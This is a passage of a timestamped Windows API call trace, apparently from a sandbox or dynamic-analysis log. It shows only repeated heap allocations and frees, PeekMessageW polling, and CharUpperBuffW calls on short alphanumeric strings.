0x2a5dfa8 [0210.833] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c58 [0210.833] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d88 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0210.834] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.834] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.834] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0210.834] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0210.834] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a741a8 [0210.835] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0210.835] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0210.835] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.835] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0210.835] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.835] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c48 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a741a8 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7020 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7020 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.836] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.836] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.837] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0210.837] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaed0 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0210.837] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0210.837] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.837] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0210.838] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.838] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0210.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0210.838] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.839] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.839] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0210.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.839] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0210.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0210.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0210.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0210.840] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0210.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.840] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.840] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.840] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0210.840] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.840] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0210.841] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0210.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0210.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.842] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: 